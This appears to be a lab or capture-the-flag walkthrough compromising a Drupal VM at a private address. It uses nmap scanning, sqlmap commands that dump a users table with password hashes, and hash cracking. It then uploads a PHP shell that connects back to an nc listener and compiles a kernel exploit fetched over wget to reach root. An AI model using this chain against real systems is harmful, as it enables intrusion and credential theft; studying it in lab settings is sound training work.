We start scanning the host with nmap –A –T4 –p- 192.168.1.5 –vv
Scanning directories with dirb came with:
Ok the robots.txt file came with a lot to know:
We can see from the robots.txt file there are some sql databases on the site, we need to find it to exploit it with sqlmap, so let’s visit the links on the site:
sqlmap -u 192.168.1.5/?nid=1 –dbs –batch –risk 3 –level 5
sqlmap -u 192.168.1.5/?nid=1 -D d7db –tables –batch –risk 3 –level 5
sqlmap -u 192.168.1.5/?nid=1 -D d7db -T users –columns –dump
Now we have 2 users with hash passwords:
admin | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
john | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
using John to crack the hash, john hash camw with password turtle, while the admin hash looks like is going to take time as maybe it’s not meant to be cracked, so let’s use john’s password to login.
We going to use the link to login http://192.168.1.5/user/
Now navigate to this webpage http://192.168.1.5/user#overlay=node/3/webform/configure and change Text Format to PHP
Now let’s upload a php shell code to this page:
After that we go to the contacts page and fill it with anything and click submit while on our end there is a nc with the port 444 which I use ready for the connection to be made.
Ok now I used a tool called linux-exploit-suggester.sh and searched for the exploit on my machine using searchsploit and located it, then complied it with gcc, then transfer to the host using wget and SimpleHTTPServer.
Gcc –o hack2 45010.c
Change directory to /root and cat flag.txt and we are done!!!